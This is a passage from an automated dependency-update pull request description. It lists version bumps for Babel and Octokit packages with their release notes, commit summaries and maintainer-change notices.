\u003ccode\u003ebabel-plugin-syntax-function-bind\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-sent\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-attributes\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-defer\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-jsx\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-module-blocks\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-optional-chaining-assign\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-partial-application\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-pipeline-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-throw-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-typescript\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-to-generator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-properties\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-static-block\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-dotall-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-duplicate-named-capturing-groups-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-exponentiation-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-json-strings\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-logical-assignment-operators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-nullish-coalescing-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-numeric-separator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-object-rest-spread\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-catch-binding\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-chaining\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-methods\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-property-in-object\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-regexp-modifiers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-property-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-sets-regex\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17580\"\u003e#17580\u003c/a\u003e Allow Babel 8 in compatible Babel 7 plugins (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/84366a8ea453814e732784db74cf2e2b6635eb6f\"\u003e\u003ccode\u003e84366a8\u003c/code\u003e\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentP...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/229eb452c5d5d2be0dc138ec2956aff7ff1057d7\"\u003e\u003ccode\u003e229eb45\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates s...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/905bc22b2fff23673eabe467815c67b29bf8bba2\"\u003e\u003ccode\u003e905bc22\u003c/code\u003e\u003c/a\u003e fix: lint errors in main branch (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17612\"\u003e#17612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a03e2b63ae530674e866b60350b7eb4a5fcb5f59\"\u003e\u003ccode\u003ea03e2b6\u003c/code\u003e\u003c/a\u003e fix: \u003ccode\u003epath.evaluate\u003c/code\u003e correctly returns \u003ccode\u003econfident\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17584\"\u003e#17584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aac2c37e11ad58905f7f9606103074e80bacbbcd\"\u003e\u003ccode\u003eaac2c37\u003c/code\u003e\u003c/a\u003e chore: Use Gulpfile.mts (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17579\"\u003e#17579\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/65c4a6b3ee0e1d32801529e841572bb22534e1f3\"\u003e\u003ccode\u003e65c4a6b\u003c/code\u003e\u003c/a\u003e [Babel 8] fix: Improve \u003ccode\u003etraverse\u003c/code\u003e types (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17574\"\u003e#17574\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99dcba5e71de3bd81ce14077cfa5b6df58e9b177\"\u003e\u003ccode\u003e99dcba5\u003c/code\u003e\u003c/a\u003e chore: enable some ts-eslint rules (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17592\"\u003e#17592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/c92c4919771105140015167f25f7bacac77c90d9\"\u003e\u003ccode\u003ec92c491\u003c/code\u003e\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17589\"\u003e#17589\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.0/packages/babel-traverse\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​babel/traverse\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING 